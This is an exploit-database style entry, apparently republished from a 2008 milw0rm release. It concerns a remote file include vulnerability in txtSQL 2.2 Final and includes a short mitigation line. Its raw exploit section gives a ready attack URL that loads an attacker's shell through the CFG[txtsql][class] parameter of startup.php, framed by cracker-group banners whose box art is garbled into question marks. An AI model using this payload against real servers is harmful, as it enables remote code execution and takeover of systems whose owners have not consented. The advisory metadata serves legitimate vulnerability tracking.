Cracker: The Crack of Eternal Might

vendor:

txtSQL

by:

CraCkEr

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: txtSQL

Affected Version From: txtSQL 2.2 Final

Affected Version To: txtSQL 2.2 Final

Patch Exists: NO

Related CWE: N/A

CPE: txtSQL

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Cracker: The Crack of Eternal Might

txtSQL 2.2 Final is vulnerable to a Remote File Include vulnerability, which can be exploited by remote attackers to gain system access. This vulnerability is typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Mitigation:

Disable register globals and use input validation.

Source

Exploit-DB raw data:

???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??                          [ Remote File Include ]                         ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Group    : N/A                    ? ?                                    ?
?   Script   : txtSQL 2.2 Final       ? ?         Register Globals :         ?
?   Download : sourceforge.net        ? ?                                    ?
?   Method   : GET                    ? ?          [?] ON   [ ] OFF          ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : System access          ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????

[RFI]
  
http://localhost/path/examples/txtSQLAdmin/startup.php?CFG[txtsql][class]=[SHELL]

   
??????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2008-08-10]